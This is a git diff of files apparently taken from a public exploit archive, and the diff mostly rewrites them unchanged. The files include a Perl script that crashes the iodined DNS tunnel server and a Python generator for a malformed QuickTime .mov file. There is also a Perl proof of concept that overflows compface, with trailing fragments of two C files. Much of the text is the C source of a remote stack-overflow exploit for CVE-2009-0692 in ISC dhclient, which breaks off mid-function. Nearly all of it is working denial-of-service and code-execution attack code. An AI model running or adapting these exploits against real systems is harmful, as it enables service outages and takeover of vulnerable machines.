+use strict;
+
+my $pkt_header = "\x00\x01\x01\x00\x00\x01\x00\x00\x00\x00\x00\x01\x0b\x56\x63\x61\x61\x61\x69\x61\x71\x61\x61\x64";
+my $pkt_footer = "\x00\x00\x0a\x00\x01\x00\x00\x29\x10\x00\x00\x00\x80\x00\x00\x00";
+
+if ($#ARGV != 1) {
+ print "shoot-iodined <= 0.4.2 - \n".
+ "=============================================\n".
+ "Usage: ./shoot-iodined host domain\n".
+ " * host: Host addr where iodined is listening\n".
+ " * domain: Domain that iodined is using\n";
+ exit 1;
+}
+
+my $host = $ARGV[0];
+my $domain = $ARGV[1];
+my $template = 'a24';
+my @pkt;;
+my $l;
+
+push(@pkt, $pkt_header);
+my @chunk = split(/\./, $domain);
+
+foreach (@chunk) {
+ $l = length $_;
+ $template = $template . 'Ca'. $l;
+ push(@pkt, $l);
+ push(@pkt, $_);
+}
+$template = $template . 'a16';
+push(@pkt, $pkt_footer);
+
+$| = 1;
+print " [*] Shooting iodined at host $host...\n";
+
+my $sock = IO::Socket::INET->new( Proto => 'udp',
+ PeerPort => 53,
+ PeerAddr => $host) or die "Creating socket: $!\n";
+
+$sock->send(pack($template, @pkt)) or die "send: $!";
+
+print " [*] If the domain was ok, now the service is down.\n";
+
+# milw0rm.com [2009-04-27]
diff --git a/platforms/linux/dos/8960.py b/platforms/linux/dos/8960.py
index 209d402cd..8edbb7bd4 100755
--- a/platforms/linux/dos/8960.py
+++ b/platforms/linux/dos/8960.py
@@ -1,80 +1,80 @@ -#0:000> !exploitable -v -#HostMachine\HostUser -#Executing Processor Architecture is x86 -#Debuggee is in User Mode -#Debuggee is a live user mode debugging session on the local machine -#Event Type: Exception -#Exception Faulting Address: 0x66830f9b -#First Chance Exception Type: STATUS_STACK_OVERFLOW (0xC00000FD) -# -#Faulting Instruction:66830f9b push ebx -# -#Basic Block: -# 66830f9b push ebx -# Tainted Input Operands: ebx -# 66830f9c push ebp -# 66830f9d mov ebp,dword ptr +0x41f (00000420)[esp] -# 66830fa4 push esi -# 66830fa5 push edi -# 66830fa6 mov edi,ecx -# 66830fa8 cmp edi,offset +0x5ff (00000600) -# 66830fae mov ebx,edx -# 66830fb0 mov dword ptr [esp+14h],eax -# 66830fb4 mov byte ptr [esp+10h],0 -# 66830fb9 mov byte ptr [esp+11h],0 -# 66830fbe mov byte ptr [esp+12h],0 -# 66830fc3 je quicktime!dllmain+0x2fbc4 (668310a4) -# -#Exception Hash (Major/Minor): 0x614b6671.0x614b786e -# -#Stack Trace: -#QuickTime!DllMain+0x2fabb -#+0x1231137 -#Instruction Address: 0x66830f9b -# -#Description: Stack Overflow -#Short Description: StackOverflow -#Exploitability Classification: UNKNOWN -#Recommended Bug Title: Stack Overflow starting at QuickTime!DllMain+0x2fabb (Hash=0x614b6671.0x614b786e) - -print "------------------------------" -print "w3bd3vil [at] gmail [dot] com" -print "Apple QuickTime CRGN Atom 0day" -print "------------------------------" -bytes = [ -0x00, 0x00, 0x00, 0x18, 0x66, 0x74, 0x79, 0x70, 0x33, 0x67, 0x70, -0x35, 0x00, 0x00, 0x01, 0x00, 0x33, 0x67, 0x70, 0x35, 0x33, 0x67, -0x70, 0x34, 0x00, 0x00, 0x01, 0x16, 0x6D, 0x6F, 0x6F, 0x76, 0x00, -0x00, 0x00, 0x6C, 0x6D, 0x76, 0x68, 0x64, 0x00, 0x00, 0x00, 0x00, -0xBF, 0x88, 0x12, 0x28, 0xBF, 0x88, 0x12, 0x28, 0x00, 0x00, 0x02, -0x58, 0x00, 0x00, 0x0B, 0x90, 0x00, 0x01, 0x00, 0x00, 0x01, 0x00, -0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, -0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, -0x00, 0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 
0x00, -0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, -0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, -0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, -0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00, 0x00, -0xA2, 0x74, 0x72, 0x61, 0x6B, 0x00, 0x00, 0x00, 0x5C, 0x74, 0x6B, -0x68, 0x64, 0x00, 0x00, 0x00, 0x01, 0xBF, 0x88, 0x12, 0x28, 0xBF, -0x88, 0x12, 0x28, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, -0x00, 0x00, 0x0B, 0x90, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, -0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, -0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, -0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, -0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, -0x00, 0x00, 0xB0, 0x00, 0x00, 0x00, 0x90, 0x00, 0x00, 0x00, 0x00, -0x00, 0x1A, 0x63, 0x6C, 0x69, 0x70, 0x00, 0x00, 0x00, 0x0E, 0x63, -0x72, 0x67, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, -0xFF, 0xFF, 0x00, 0x00, 0x00, 0x24, 0x65, 0x64, 0x74, 0x73, 0x00, -0x00, 0x00, 0x1c, 0x65, 0x6c, 0x73, 0x74, 0x00, 0x00, 0x00, 0x00, -0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x0b, 0x90, 0x00, 0x00, 0x00, -0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x66, 0x72, -0x65, 0x65, 0x00, 0x00, 0x00, 0x08, 0x66, 0x72, 0x65, 0x65 ] - -f = open("webDEViL.mov", "wb") -for byte in bytes: f.write("%c" % byte) -f.close() -print "webDEViL.mov created! 
(%d bytes)" % len(bytes) - -# milw0rm.com [2009-06-15] +#0:000> !exploitable -v +#HostMachine\HostUser +#Executing Processor Architecture is x86 +#Debuggee is in User Mode +#Debuggee is a live user mode debugging session on the local machine +#Event Type: Exception +#Exception Faulting Address: 0x66830f9b +#First Chance Exception Type: STATUS_STACK_OVERFLOW (0xC00000FD) +# +#Faulting Instruction:66830f9b push ebx +# +#Basic Block: +# 66830f9b push ebx +# Tainted Input Operands: ebx +# 66830f9c push ebp +# 66830f9d mov ebp,dword ptr +0x41f (00000420)[esp] +# 66830fa4 push esi +# 66830fa5 push edi +# 66830fa6 mov edi,ecx +# 66830fa8 cmp edi,offset +0x5ff (00000600) +# 66830fae mov ebx,edx +# 66830fb0 mov dword ptr [esp+14h],eax +# 66830fb4 mov byte ptr [esp+10h],0 +# 66830fb9 mov byte ptr [esp+11h],0 +# 66830fbe mov byte ptr [esp+12h],0 +# 66830fc3 je quicktime!dllmain+0x2fbc4 (668310a4) +# +#Exception Hash (Major/Minor): 0x614b6671.0x614b786e +# +#Stack Trace: +#QuickTime!DllMain+0x2fabb +#+0x1231137 +#Instruction Address: 0x66830f9b +# +#Description: Stack Overflow +#Short Description: StackOverflow +#Exploitability Classification: UNKNOWN +#Recommended Bug Title: Stack Overflow starting at QuickTime!DllMain+0x2fabb (Hash=0x614b6671.0x614b786e) + +print "------------------------------" +print "w3bd3vil [at] gmail [dot] com" +print "Apple QuickTime CRGN Atom 0day" +print "------------------------------" +bytes = [ +0x00, 0x00, 0x00, 0x18, 0x66, 0x74, 0x79, 0x70, 0x33, 0x67, 0x70, +0x35, 0x00, 0x00, 0x01, 0x00, 0x33, 0x67, 0x70, 0x35, 0x33, 0x67, +0x70, 0x34, 0x00, 0x00, 0x01, 0x16, 0x6D, 0x6F, 0x6F, 0x76, 0x00, +0x00, 0x00, 0x6C, 0x6D, 0x76, 0x68, 0x64, 0x00, 0x00, 0x00, 0x00, +0xBF, 0x88, 0x12, 0x28, 0xBF, 0x88, 0x12, 0x28, 0x00, 0x00, 0x02, +0x58, 0x00, 0x00, 0x0B, 0x90, 0x00, 0x01, 0x00, 0x00, 0x01, 0x00, +0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, +0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, +0x00, 0x00, 0x00, 0x00, 
0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, +0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, +0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, +0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, +0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x03, 0x00, 0x00, 0x00, +0xA2, 0x74, 0x72, 0x61, 0x6B, 0x00, 0x00, 0x00, 0x5C, 0x74, 0x6B, +0x68, 0x64, 0x00, 0x00, 0x00, 0x01, 0xBF, 0x88, 0x12, 0x28, 0xBF, +0x88, 0x12, 0x28, 0x00, 0x00, 0x00, 0x02, 0x00, 0x00, 0x00, 0x00, +0x00, 0x00, 0x0B, 0x90, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, +0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x01, +0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, +0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, +0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, +0x00, 0x00, 0xB0, 0x00, 0x00, 0x00, 0x90, 0x00, 0x00, 0x00, 0x00, +0x00, 0x1A, 0x63, 0x6C, 0x69, 0x70, 0x00, 0x00, 0x00, 0x0E, 0x63, +0x72, 0x67, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, +0xFF, 0xFF, 0x00, 0x00, 0x00, 0x24, 0x65, 0x64, 0x74, 0x73, 0x00, +0x00, 0x00, 0x1c, 0x65, 0x6c, 0x73, 0x74, 0x00, 0x00, 0x00, 0x00, +0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x0b, 0x90, 0x00, 0x00, 0x00, +0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x08, 0x66, 0x72, +0x65, 0x65, 0x00, 0x00, 0x00, 0x08, 0x66, 0x72, 0x65, 0x65 ] + +f = open("webDEViL.mov", "wb") +for byte in bytes: f.write("%c" % byte) +f.close() +print "webDEViL.mov created! (%d bytes)" % len(bytes) + +# milw0rm.com [2009-06-15] diff --git a/platforms/linux/dos/8982.txt b/platforms/linux/dos/8982.txt index 3fc9badd0..7d505081c 100755 --- a/platforms/linux/dos/8982.txt +++ b/platforms/linux/dos/8982.txt 
@@ -1,20 +1,20 @@ -#!/usr/bin/perl -######################################################################### -####VIVA#ISLAM##################################################ALLAH#### -######################################################################### -# compface <= 1.5.2 bufer overflow p o c -# vuln only excist on debian and ubuntu? - packages.debian.org/compface - -# author: metalhoney ------- metalhoney1@hotmail.com ------- -######################################################################### -open(ISLAM,">allah.xbm") or die; -print ISLAM "#define noname_width 48\n#define noname_height 48\n"; -print ISLAM "static "; -print ISLAM "A"x184; -print ISLAM " char = {\n"; -close(ISLAM) or die; -print "run now: compface allah.xbm\nmetalhoney signing off\nviva islam\n"; -######################################################################### -####VIVA#ISLAM##################################################ALLAH#### -######################################################################### - -# milw0rm.com [2009-06-17] +#!/usr/bin/perl +######################################################################### +####VIVA#ISLAM##################################################ALLAH#### +######################################################################### +# compface <= 1.5.2 bufer overflow p o c +# vuln only excist on debian and ubuntu? 
- packages.debian.org/compface - +# author: metalhoney ------- metalhoney1@hotmail.com ------- +######################################################################### +open(ISLAM,">allah.xbm") or die; +print ISLAM "#define noname_width 48\n#define noname_height 48\n"; +print ISLAM "static "; +print ISLAM "A"x184; +print ISLAM " char = {\n"; +close(ISLAM) or die; +print "run now: compface allah.xbm\nmetalhoney signing off\nviva islam\n"; +######################################################################### +####VIVA#ISLAM##################################################ALLAH#### +######################################################################### + +# milw0rm.com [2009-06-17] diff --git a/platforms/linux/dos/904.c b/platforms/linux/dos/904.c index e29272686..ba8bf1982 100755 --- a/platforms/linux/dos/904.c +++ b/platforms/linux/dos/904.c @@ -82,6 +82,6 @@ perror("read"); printf("read=%d mv=%x fv=%x\n %.300s",i,(int)mv,fv,buf2); while(42); return 42; -} - -// milw0rm.com [2005-03-29] +} + +// milw0rm.com [2005-03-29] diff --git a/platforms/linux/dos/911.c b/platforms/linux/dos/911.c index 69d86ef96..16198b11e 100755 --- a/platforms/linux/dos/911.c +++ b/platforms/linux/dos/911.c @@ -101,6 +101,6 @@ close(fd); printf("This will panic on ppc64\n"); return err; -} - -// milw0rm.com [2005-04-04] +} + +// milw0rm.com [2005-04-04] diff --git a/platforms/linux/dos/9265.c b/platforms/linux/dos/9265.c index d4e722842..f561b377b 100755 --- a/platforms/linux/dos/9265.c +++ b/platforms/linux/dos/9265.c 
@@ -1,308 +1,308 @@ -/* - * cve-2009-0692.c - * - * ISC DHCP dhclient < 3.1.2p1 Remote Exploit - * Jon Oberheide - * http://jon.oberheide.org - * - * Information: - * - * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0692 - * - * Stack-based buffer overflow in the script_write_params method in - * client/dhclient.c in ISC DHCP dhclient 4.1 before 4.1.0p1, 4.0 before - * 4.0.1p1, 3.1 before 3.1.2p1, 3.0, and 2.0 allows remote DHCP servers to - * execute arbitrary code via a crafted subnet-mask option. - * - * Usage: - * - * $ gcc cve-2009-0692.c -o cve-2009-0692 -lpcap -ldnet - * $ sudo ./cve-2009-0692 - * [+] listening on eth0: ip and udp and src port 68 and dst port 67 - * [+] snarfed DHCP request from 00:19:d1:90:e5:4a with xid 0x120f8920 - * [+] sending malicious DHCP response to 00:19:d1:90:e5:4a with xid 0x120f8920 - * - * $ gdb /sbin/dhclient - * ... - * DHCPREQUEST on eth0 to 255.255.255.255 port 67 - * DHCPACK from 0.6.9.2 - * ... - * Program received signal SIGSEGV, Segmentation fault. - * 0x41414141 in ?? () - * - * Notes: - * - * Only tested with dhclient 3.1.2 on 32-bit Gentoo / GCC 4.3.3. Feel free - * to tweak for your target platform. Depends on libdnet and libpcap. - * - * READABLE_1 and READABLE_2 need to be readable addresses as we fix up the - * stack during our overflow. After a successful return from the vulnerable - * script_write_params function, EIP will be set to JMP_TARGET. - * - * Exclusively for use at DEFCON next week. 
;-) - */ - -#include -#include -#include -#include -#include -#include -#include -#include - -#define READABLE_1 "\xa8\xfc\x0b\x08" /* for es.client */ -#define READABLE_2 "\xbc\x34\x0a\x08" /* for es.prefix */ -#define JMP_TARGET "\x41\x41\x41\x41" - -#define BPF_FILTER "ip and udp and src port 68 and dst port 67" -#define PKT_BUFSIZ 1514 -#define DHCP_OP_REQUEST 1 -#define DHCP_OP_REPLY 2 -#define DHCP_TYPE_REQUEST 3 -#define DHCP_TYPE_ACK 5 -#define DHCP_OPT_REQIP 50 -#define DHCP_OPT_MSGTYPE 53 -#define DHCP_OPT_END 255 -#define DHCP_CHADDR_LEN 16 -#define SERVERNAME_LEN 64 -#define BOOTFILE_LEN 128 -#define DHCP_HDR_LEN 240 -#define DHCP_OPT_HDR_LEN 2 - -#ifndef __GNUC__ -# define __attribute__(x) -# pragma pack(1) -#endif - -struct dhcp_hdr { - uint8_t op; - uint8_t hwtype; - uint8_t hwlen; - uint8_t hwopcount; - uint32_t xid; - uint16_t secs; - uint16_t flags; - uint32_t ciaddr; - uint32_t yiaddr; - uint32_t siaddr; - uint32_t giaddr; - uint8_t chaddr[DHCP_CHADDR_LEN]; - uint8_t servername[SERVERNAME_LEN]; - uint8_t bootfile[BOOTFILE_LEN]; - uint32_t cookie; -} __attribute__((__packed__)); - -struct dhcp_opt { - uint8_t opt; - uint8_t len; -} __attribute__((__packed__)); - -#ifndef __GNUC__ -# pragma pack() -#endif - -void -process(u_char *data, const struct pcap_pkthdr *pkthdr, const u_char *pkt) -{ - eth_t *raw; - struct ip_hdr *ip_h; - struct eth_hdr *eth_h; - struct udp_hdr *udp_h; - struct dhcp_hdr *dhcp_h; - struct dhcp_opt *dhcp_opt; - char *dev = data, *ptr; - char pktbuf[PKT_BUFSIZ], options[PKT_BUFSIZ], payload[PKT_BUFSIZ]; - int opt_len, clen = pkthdr->caplen; - uint8_t msg_type = 0, payload_len = 0; - uint32_t yiaddr = 0; - - /* packet too short */ - if (clen < ETH_HDR_LEN + IP_HDR_LEN + UDP_HDR_LEN + DHCP_HDR_LEN + DHCP_OPT_HDR_LEN) { - return; - } - - eth_h = (struct eth_hdr *) pkt; - ip_h = (struct ip_hdr *) ((char *) eth_h + ETH_HDR_LEN); - udp_h = (struct udp_hdr *) ((char *) ip_h + IP_HDR_LEN); - dhcp_h = (struct dhcp_hdr *) ((char *) udp_h 
+ UDP_HDR_LEN); - dhcp_opt = (struct dhcp_opt *) ((char *) dhcp_h + DHCP_HDR_LEN); - - /* only care about REQUEST opcodes */ - if (dhcp_h->op != DHCP_OP_REQUEST) { - return; - } - - /* parse DHCP options */ - while (1) { - if (dhcp_opt->opt == DHCP_OPT_MSGTYPE) { - if (dhcp_opt->len != 1) { - return; - } - memcpy(&msg_type, (char *) dhcp_opt + DHCP_OPT_HDR_LEN, dhcp_opt->len); - } - if (dhcp_opt->opt == DHCP_OPT_REQIP) { - if (dhcp_opt->len != 4) { - return; - } - memcpy(&yiaddr, (char *) dhcp_opt + DHCP_OPT_HDR_LEN, dhcp_opt->len); - } - if (dhcp_opt->opt == DHCP_OPT_END) { - break; - } - if (((char *) dhcp_opt - (char *) pkt) + DHCP_OPT_HDR_LEN + dhcp_opt->len > clen) { - break; - } - dhcp_opt = (struct dhcp_opt *) ((char *) dhcp_opt + DHCP_OPT_HDR_LEN + dhcp_opt->len); - } - - /* only care about REQUEST msg types */ - if (msg_type != DHCP_TYPE_REQUEST) { - return; - } - - printf("[+] snarfed DHCP request from %s with xid 0x%08x\n", eth_ntoa(ð_h->eth_src), dhcp_h->xid); - printf("[+] sending malicious DHCP response to %s with xid 0x%08x\n\n", eth_ntoa(ð_h->eth_src), dhcp_h->xid); - - /* construct stack payload */ - memset(payload, 0, sizeof(payload)); - ptr = payload; - memset(ptr, 0, 16); - ptr += 16; - memcpy(ptr, READABLE_1, 4); - ptr += 4; - memcpy(ptr, READABLE_2, 4); - ptr += 4; - memset(ptr, 0, 8); - ptr += 8; - memcpy(ptr, "\x04\x00\x00\x00", 4); - ptr += 4; - memset(ptr, 0, 28); - ptr += 28; - memcpy(ptr, JMP_TARGET, 4); - ptr += 4; - payload_len = ptr - payload; - - /* dhcp header */ - dhcp_h->op = DHCP_OP_REPLY; - memcpy(&dhcp_h->yiaddr, &yiaddr, 4); - - /* normal dhcp options */ - memset(options, 0, sizeof(options)); - ptr = options; - memcpy(ptr, "\x35\x01\x05", 3); - ptr += 3; - memcpy(ptr, "\x36\x04\x00\x06\x09\x02", 6); - ptr += 6; - memcpy(ptr, "\x33\x04\x00\x09\x3a\x80", 6); - ptr += 6; - memcpy(ptr, "\x03\x04\x00\x06\x09\x02", 6); - ptr += 6; - memcpy(ptr, "\x06\x04\x00\x06\x09\x02", 6); - ptr += 6; - - /* malicious subnet mask option */ - 
memcpy(ptr, "\x01", 1); - ptr += 1; - memcpy(ptr, &payload_len, 1); - ptr += 1; - memcpy(ptr, payload, payload_len); - ptr += payload_len; - - memcpy(ptr, "\xff", 1); - ptr += 1; - opt_len = ptr - options; - - /* construct full packet payload */ - memset(pktbuf, 0, sizeof(pktbuf)); - ptr = pktbuf; - - eth_pack_hdr(ptr, ETH_ADDR_BROADCAST, "\xc1\x1e\x20\x09\x06\x92", ETH_TYPE_IP); - ptr += ETH_HDR_LEN; - - ip_pack_hdr(ptr, 0, IP_HDR_LEN + UDP_HDR_LEN + DHCP_HDR_LEN + opt_len, 0x0692, IP_DF, 64, IP_PROTO_UDP, 34145792, IP_ADDR_BROADCAST); - ptr += IP_HDR_LEN; - - udp_pack_hdr(ptr, 67, 68, UDP_HDR_LEN + DHCP_HDR_LEN + opt_len); - ptr += UDP_HDR_LEN; - - memcpy(ptr, dhcp_h, DHCP_HDR_LEN); - ptr += DHCP_HDR_LEN; - - memcpy(ptr, options, opt_len); - ptr += opt_len; - - ip_checksum(pktbuf + ETH_HDR_LEN, IP_HDR_LEN + UDP_HDR_LEN + DHCP_HDR_LEN + opt_len); - - /* fire off malicious response */ - raw = eth_open(dev); - if (!raw) { - fprintf(stderr, "[-] error opening raw socket on %s\n", dev); - exit(1); - } - eth_send(raw, pktbuf, ETH_HDR_LEN + IP_HDR_LEN + UDP_HDR_LEN + DHCP_HDR_LEN + opt_len); - eth_close(raw); -} - -void -usage(char **argv) -{ - fprintf(stderr, "usage: %s [-i interface]\n", argv[0]); - exit(1); -} - -int -main(int argc, char **argv) -{ - int ch, ret; - char *dev = NULL; - char errbuf[PCAP_ERRBUF_SIZE]; - struct bpf_program bfp; - pcap_t *ph; - - opterr = 0; - - while ((ch = getopt(argc, argv, "i:")) != -1) { - switch (ch) { - case 'i': - dev = optarg; - break; - default: - usage(argv); - } - } - - if (!dev) { - dev = pcap_lookupdev(errbuf); - if (!dev) { - fprintf(stderr, "[-] couldn't find default interface: %s\n", errbuf); - exit(1); - } - } - - ph = pcap_open_live(dev, PKT_BUFSIZ, 1, 1, errbuf); - if (!ph) { - fprintf(stderr, "[-] couldn't open interface %s: %s\n", dev, errbuf); - exit(1); - } - - ret = pcap_compile(ph, &bfp, BPF_FILTER, 1, 0); - if (ret == -1) { - fprintf(stderr, "[-] couldn't parse BPF filter: %s\n", pcap_geterr(ph)); - exit(1); - } 
- - pcap_setfilter(ph, &bfp); - if (ret == -1) { - fprintf(stderr, "[-] couldn't set BPF filter: %s\n", pcap_geterr(ph)); - exit(1); - } - - printf("[+] listening on %s: %s\n", dev, BPF_FILTER); - - pcap_loop(ph, -1, process, dev); - - return 0; -} - -// milw0rm.com [2009-07-27] +/* + * cve-2009-0692.c + * + * ISC DHCP dhclient < 3.1.2p1 Remote Exploit + * Jon Oberheide + * http://jon.oberheide.org + * + * Information: + * + * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0692 + * + * Stack-based buffer overflow in the script_write_params method in + * client/dhclient.c in ISC DHCP dhclient 4.1 before 4.1.0p1, 4.0 before + * 4.0.1p1, 3.1 before 3.1.2p1, 3.0, and 2.0 allows remote DHCP servers to + * execute arbitrary code via a crafted subnet-mask option. + * + * Usage: + * + * $ gcc cve-2009-0692.c -o cve-2009-0692 -lpcap -ldnet + * $ sudo ./cve-2009-0692 + * [+] listening on eth0: ip and udp and src port 68 and dst port 67 + * [+] snarfed DHCP request from 00:19:d1:90:e5:4a with xid 0x120f8920 + * [+] sending malicious DHCP response to 00:19:d1:90:e5:4a with xid 0x120f8920 + * + * $ gdb /sbin/dhclient + * ... + * DHCPREQUEST on eth0 to 255.255.255.255 port 67 + * DHCPACK from 0.6.9.2 + * ... + * Program received signal SIGSEGV, Segmentation fault. + * 0x41414141 in ?? () + * + * Notes: + * + * Only tested with dhclient 3.1.2 on 32-bit Gentoo / GCC 4.3.3. Feel free + * to tweak for your target platform. Depends on libdnet and libpcap. + * + * READABLE_1 and READABLE_2 need to be readable addresses as we fix up the + * stack during our overflow. After a successful return from the vulnerable + * script_write_params function, EIP will be set to JMP_TARGET. + * + * Exclusively for use at DEFCON next week. 
;-) + */ + +#include +#include +#include +#include +#include +#include +#include +#include + +#define READABLE_1 "\xa8\xfc\x0b\x08" /* for es.client */ +#define READABLE_2 "\xbc\x34\x0a\x08" /* for es.prefix */ +#define JMP_TARGET "\x41\x41\x41\x41" + +#define BPF_FILTER "ip and udp and src port 68 and dst port 67" +#define PKT_BUFSIZ 1514 +#define DHCP_OP_REQUEST 1 +#define DHCP_OP_REPLY 2 +#define DHCP_TYPE_REQUEST 3 +#define DHCP_TYPE_ACK 5 +#define DHCP_OPT_REQIP 50 +#define DHCP_OPT_MSGTYPE 53 +#define DHCP_OPT_END 255 +#define DHCP_CHADDR_LEN 16 +#define SERVERNAME_LEN 64 +#define BOOTFILE_LEN 128 +#define DHCP_HDR_LEN 240 +#define DHCP_OPT_HDR_LEN 2 + +#ifndef __GNUC__ +# define __attribute__(x) +# pragma pack(1) +#endif + +struct dhcp_hdr { + uint8_t op; + uint8_t hwtype; + uint8_t hwlen; + uint8_t hwopcount; + uint32_t xid; + uint16_t secs; + uint16_t flags; + uint32_t ciaddr; + uint32_t yiaddr; + uint32_t siaddr; + uint32_t giaddr; + uint8_t chaddr[DHCP_CHADDR_LEN]; + uint8_t servername[SERVERNAME_LEN]; + uint8_t bootfile[BOOTFILE_LEN]; + uint32_t cookie; +} __attribute__((__packed__)); + +struct dhcp_opt { + uint8_t opt; + uint8_t len; +} __attribute__((__packed__)); + +#ifndef __GNUC__ +# pragma pack() +#endif + +void +process(u_char *data, const struct pcap_pkthdr *pkthdr, const u_char *pkt) +{ + eth_t *raw; + struct ip_hdr *ip_h; + struct eth_hdr *eth_h; + struct udp_hdr *udp_h; + struct dhcp_hdr *dhcp_h; + struct dhcp_opt *dhcp_opt; + char *dev = data, *ptr; + char pktbuf[PKT_BUFSIZ], options[PKT_BUFSIZ], payload[PKT_BUFSIZ]; + int opt_len, clen = pkthdr->caplen; + uint8_t msg_type = 0, payload_len = 0; + uint32_t yiaddr = 0; + + /* packet too short */ + if (clen < ETH_HDR_LEN + IP_HDR_LEN + UDP_HDR_LEN + DHCP_HDR_LEN + DHCP_OPT_HDR_LEN) { + return; + } + + eth_h = (struct eth_hdr *) pkt; + ip_h = (struct ip_hdr *) ((char *) eth_h + ETH_HDR_LEN); + udp_h = (struct udp_hdr *) ((char *) ip_h + IP_HDR_LEN); + dhcp_h = (struct dhcp_hdr *) ((char *) udp_h 
+ UDP_HDR_LEN); + dhcp_opt = (struct dhcp_opt *) ((char *) dhcp_h + DHCP_HDR_LEN); + + /* only care about REQUEST opcodes */ + if (dhcp_h->op != DHCP_OP_REQUEST) { + return; + } + + /* parse DHCP options */ + while (1) { + if (dhcp_opt->opt == DHCP_OPT_MSGTYPE) { + if (dhcp_opt->len != 1) { + return; + } + memcpy(&msg_type, (char *) dhcp_opt + DHCP_OPT_HDR_LEN, dhcp_opt->len); + } + if (dhcp_opt->opt == DHCP_OPT_REQIP) { + if (dhcp_opt->len != 4) { + return; + } + memcpy(&yiaddr, (char *) dhcp_opt + DHCP_OPT_HDR_LEN, dhcp_opt->len); + } + if (dhcp_opt->opt == DHCP_OPT_END) { + break; + } + if (((char *) dhcp_opt - (char *) pkt) + DHCP_OPT_HDR_LEN + dhcp_opt->len > clen) { + break; + } + dhcp_opt = (struct dhcp_opt *) ((char *) dhcp_opt + DHCP_OPT_HDR_LEN + dhcp_opt->len); + } + + /* only care about REQUEST msg types */ + if (msg_type != DHCP_TYPE_REQUEST) { + return; + } + + printf("[+] snarfed DHCP request from %s with xid 0x%08x\n", eth_ntoa(ð_h->eth_src), dhcp_h->xid); + printf("[+] sending malicious DHCP response to %s with xid 0x%08x\n\n", eth_ntoa(ð_h->eth_src), dhcp_h->xid); + + /* construct stack payload */ + memset(payload, 0, sizeof(payload)); + ptr = payload; + memset(ptr, 0, 16); + ptr += 16; + memcpy(ptr, READABLE_1, 4); + ptr += 4; + memcpy(ptr, READABLE_2, 4); + ptr += 4; + memset(ptr, 0, 8); + ptr += 8; + memcpy(ptr, "\x04\x00\x00\x00", 4); + ptr += 4; + memset(ptr, 0, 28); + ptr += 28; + memcpy(ptr, JMP_TARGET, 4); + ptr += 4; + payload_len = ptr - payload; + + /* dhcp header */ + dhcp_h->op = DHCP_OP_REPLY; + memcpy(&dhcp_h->yiaddr, &yiaddr, 4); + + /* normal dhcp options */ + memset(options, 0, sizeof(options)); + ptr = options; + memcpy(ptr, "\x35\x01\x05", 3); + ptr += 3; + memcpy(ptr, "\x36\x04\x00\x06\x09\x02", 6); + ptr += 6; + memcpy(ptr, "\x33\x04\x00\x09\x3a\x80", 6); + ptr += 6; + memcpy(ptr, "\x03\x04\x00\x06\x09\x02", 6); + ptr += 6; + memcpy(ptr, "\x06\x04\x00\x06\x09\x02", 6); + ptr += 6; + + /* malicious subnet mask option */ + 
